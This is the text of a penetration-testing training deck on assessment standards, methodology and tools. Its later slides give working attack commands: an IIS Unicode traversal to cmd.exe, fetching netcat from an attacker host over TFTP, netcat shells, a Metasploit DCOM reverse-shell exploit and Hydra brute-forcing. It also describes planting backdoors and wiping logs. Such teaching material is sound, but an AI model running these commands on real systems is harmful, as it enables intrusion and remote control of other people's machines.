NSA and PT

1. Program: Certified Computer Security Analyst (CCSA) LSP Telematika Created By Semi Yulianto Shared By Linuxer@kaskus.co.id

2. Semi Yulianto MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA, CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc  Independent Trainer and Consultant  EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia) Current Roles: ITS2 (Riyadh, Saudi Arabia) Senior Technical Trainer/Security Consultant IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)  Security Consultant (Web Application Pen-Tester)  Security Consultant (ESET Anti-Virus & Smart Security) semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com Contacts: +62 852 1325 6600 and +60 14 9377 462

3. 1. Vulnerabilities by Management Categories 2. Assessment Standards 3. Assessment Service Definition 4. Network Assessment Methodology 5. Pen-Test Methodology 6. Security Tools 7. Investigating Vulnerabilities

4. OS configuration - Vulnerabilities due to improperly configured operating system software.  Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.  Password/access control - Failure to comply with password policy and improper access control settings.  Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.  Dangerous services - Existence of vulnerable or easily exploited services or processes.  Application configuration - Vulnerabilities due to improperly configured applications. 

7. The United States National Security Agency (NSA) has provided an NSA (US) INFOSEC Assessment Methodology (IAM) framework to help consultants  and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com The Government Communications Headquarters (GCHQ) in the United CESG CHECK (UK) Kingdom has an information assurance arm known as the Communications   and Electronics security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security Security Group (CESG). In the same way that the NSA IAM framework allows testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm

8.  Assessment - Level 1 involves discovering a cooperative high- The IAM framework defines three levels of assessment: level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands- on network or system testing is undertaken at this level. Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.  Red Team - Level 3 is non cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is on intrusive, so within  this framework, a Level 3 assessment involves full qualification of vulnerabilities.

9. 1. Use of DNS information retrieval tools for both single and The CESG CHECK network security assessment as: multiple records, including an understanding of DNS record structure relating to target hosts. 2. Use of ICMP, TCP, and UDP network mapping and probing tools 3. Demonstration of TCP service banner grabbing. 4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes. 5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.

10. 1. User enumeration via finger, rusers, rwho, and SMTP CESG CHECK Unix-specific competencies: techniques 2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services. 3. Demonstration of testing for Network File System (NFS) weaknesses. 4. Testing for weaknesses within r-services (rsh, rexec, and rlogin). 5. Detection of insecure X Windows servers. 6. Testing for weaknesses within web, FTP, and Samba services.

11. 1. Assessment of NetBIOS and CIFS services to enumerate CESG CHECK Windows NT-specific competencies: users, groups, shares, domains, domain controllers, password policies, and associated weaknesses. 2. Username and password grinding via NetBIOS and CIFS services. 3. Detecting and demonstrating presence of known security weaknesses within. 4. Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.

12.  ISECOM’s Open Source Security Testing Methodology Other Assessment Standards & Associations: Manual (OSSTMM) http://www.osstmm.org  Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com  TIGER Scheme http://www.tigerscheme.org  EC-Council’s Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm  Open Source Web Application Security Project (OWASP) http://www.owasp.org

13. 1. Vulnerability Scanning 2. Network Security Assessment 3. Web Application Testing 4. Penetration Testing 5. Onsite Audit

14. Uses automated systems (such as Nessus, ISS Internet Vulnerability Scanning Scanner, QualysGuard, or eEye Retina) with minimal  hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security. An effective blend of automated and hands-on manual Network Security Assessment vulnerability testing and qualification. The report is  usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.

15. Involves post-authentication assessment of web application Web Application Testing components, identifying command injection, poor  permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated. Involves multiple attack vectors (e.g., telephone war dialing, Penetration Testing social engineering, and wireless testing) to compromise the  target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.

16. Provides the clearest picture of network security.  Onsite Audition Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.

19. 1. Network reconnaissance to identify IP networks High-level components of Network Assessment: and hosts of interest. 2. Bulk network scanning and probing to identify potentially vulnerable hosts. 3. Investigation of vulnerabilities and further network probing by hand. 4. Exploitation of vulnerabilities and circumvention of security mechanisms.

20. 1. Information Gathering 2. Service Enumeration 3. Vulnerability Identification 4. Penetration 5. Maintaining Access 6. Housekeeping

21. The objective of information gathering is to find as  Information Gathering many information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering. Involves launching network and port scanning to  Service Enumeration find open, filtered ports and services running on a specific port.

22. Involves finding new and currently available  Vulnerability Identification vulnerability on the operating systems, applications and/or services (manual or automated). Involves active penetration on a specific target of  Penetration evaluation by exploiting any new or known vulnerability.

23. Involves uploading trojan or backdoor with the Maintaining Access objective to make it easier to go in and out from a  target of evaluation without having to do the exploitation and ensure that the activities are not being noticed. Clearning up to cover tracks. Involves disabling Housekeeping audit settings and clearing or altering log files  (system, security and application).

25. 1. Nmap (http://www.insecure.org) Scanning Tools: 2. Nessus (http://www.nessus.org) 3. ISS Internet Scanner (http://www.iss.net) 4. eEye Retina (http://www.eeye.com) 5. QualysGuard (http://www.qualys.com) 6. Matta Colossus (http://www.trustmatta.com)

26. 1. Metasploit Framework Exploitation Frameworks: (http://www.metasploit.com) 2. Core IMPACT (http://www.coresecurity.com) 3. Immunity CANVAS (http://www.immunityinc.com/products- canvas.shtml)

27. 1. Paros (http://www.parosproxy.org) Proxy-based web application testing tools: 2. WebScarab http://www.owasp.org/index.php/Category:OWAS P_WebScarab_Project) 3. Burp suite (http://portswigger.net)

28. 1. Wapiti (http://wapiti.sourceforge.net) Active web application crawling and fuzzing tools: 2. Nikto (http://www.cirt.net/code/nikto.shtml)

29. 1. Acunetix Web Vulnerability Scanner Web Application Scanning Tools: (http://www.acunetix.com) 2. Watchfire AppScan (http://www.watchfire.com/products/appscan/) 3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspe ct/) 4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic _hailstorm.php)

30. 1. Securiteam (http://www.securiteam.com) Useful Websites: 2. SecurityFocus (http://www.securityfocus.com) 3. milw0rm (http://www.milw0rm.com) 4. Offensive Security Exploit DB (http://www.exploit-db.com) 5. Packet Storm (http://www.packetstormsecurity.org) 6. FrSIRT (http://www.frsirt.com) 7. MITRE Corporation CVE (http://cve.mitre.org) 8. NIST National Vulnerability Database (http://nvd.nist.gov) 9. ISS X-Force (http://xforce.iss.net) 10. CERT vulnerability notes (http://www.kb.cert.org/vuls) 11. eEye Preview (http://research.eeye.com/html/services) 12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com) 13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)

31. 1. Information Gathering 2. Service Identification 3. Vulnerability Identification 4. Penetration (Exploitation) 5. Maintaining Access 6. Housekeeping (Covering Tracks) 7. Password Cracking 8. Client-Side Hacking 9. Web Application Hacking 10. Denial-of-Service (DoS) Attacks 11. Sniffing and ARP Spoofing 12. Wireless Hacking 13. Linux Hacking 14. Analyzing Attack Signatures with IDS and Sniffer 15. Evading IDS and Firewall

32. IIS Unicode Directory Traversal Exploit  Syntax: nc –v <target_ip> <http_port> GET http://<target_ip>/scripts/<unicode_string s>/<windows_dir>/cmd.exe?/c+<command>  Example: nc –v 131.107.1.101 80 GET http://131.107.1.101/scripts/..%255c../win nt/system32/cmd.exe?/c+dir

33. TFTP (Trivial File Transfer Protocol) Upload and Download  Syntax: tftp –i <localhost_ip> GET <file> tftp –i <localhost_ip> PUT <file>  Example: tftp –i 131.107.1.252 GET nc.exe tftp –i 131.107.1.101 PUT nc.exe  Unicode Examples: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe

34. Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <port_to_listen_to> nc –vlp <port_to_listen_to>  Example: nc –v –l –p 555 nc –vlp 555

35. Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Example: nc –v 131.107.1.101 555

36. Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <listening_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+-l+-p+5555

37. Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+131.107.1.252+555

38. Nmap (Ping Sweep/Network Scan)  Syntax: nmap –sP <network_id>  Example: nmap –sP 131.107.1.0/24 Nmap (Port Scan)  Syntax: nmap <target_ip>  Example: nmap 131.107.1.101

39. Nmap (Port Scan with Options)  Syntax: nmap <option> <target_ip>  Examples: nmap –sS –sV –O 131.107.1.101 nmap –sS –sV –p80,443 –O 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 –PN 131.107.1.101 nmap –sU –sV –O 131.107.1.101 nmap –A 131.107.1.101

40. Nmap (Enumeration)  Syntax: nmap <option> <script> <target_ip>  Examples: nmap –sS –script=smb-enum-users 131.107.1.101 nmap –sS –script=smb-enum-shares 131.107.1.101 nmap –sS –script=smb-enum-domains 131.107.1.101 nmap –sS –script=smb-enum-processes 131.107.1.101 nmap –sS –script=smb-enum-security 131.107.1.101

41. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show exploits msf > use <exploit_module> msf > show payloads msf > set PAYLOAD <payload_type> msf > show options msf > set RHOST <target_ip> msf > set LHOST <localhost_ip> msf > set LPORT <local_port> msf > set RPORT <remote_port> msf > show targets msf > set TARGET <target_id> msf > exploit

42. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Example: msf > help msf > show exploits msf > use windows/dcerpc/ms03_026_dcom msf > show payloads msf > set PAYLOAD windows/shell/reverse_tcp msf > show options msf > set RHOST 131.107.1.101 msf > set LHOST 131.107.1.252 msf > set LPORT 5555 msf > set RPORT 1234 msf > show targets msf > set TARGET 0 msf > exploit

43. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show auxiliary msf > use <auxiliary_module> msf > set RHOSTS <target_ip_or_network_id> msf > run

44. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Example 1: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.101 msf > run  Example 2: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.0/24 msf > run

45. Metasploit Framework Exploit Module (MSFCLI) cd /pentest/exploits/msf3  Syntax: ./msfcli <exploit_module> <payload_type> <options> E  Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E

46. THC Hydra (Dictionary-based Password Cracking) cd /tmp  Syntax: ./hydra –L <users_file> -P <passwords_file> <target_ip> <service_type>  Examples: ./hydra –L login.txt –P pass.txt 131.107.1.101 ftp ./hydra –L login.txt –P pass.txt 131.107.1.101 smb ./hydra –L login.txt –P pass.txt 131.107.1.101 mssql ./hydra –L login.txt –P pass.txt 131.107.1.101 rpc

47. Nikto (Web Application Vulnerability Scanner) cd /pentest/nikto  Syntax: ./nikto.pl –host <target_ip>  Example: ./nikto.pl –host 131.107.1.101

NSA and PT

NSA and PT

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados(20)

Destaque

Destaque(20)

Similar a NSA and PT

Similar a NSA and PT(20)

Último

Último(20)

NSA and PT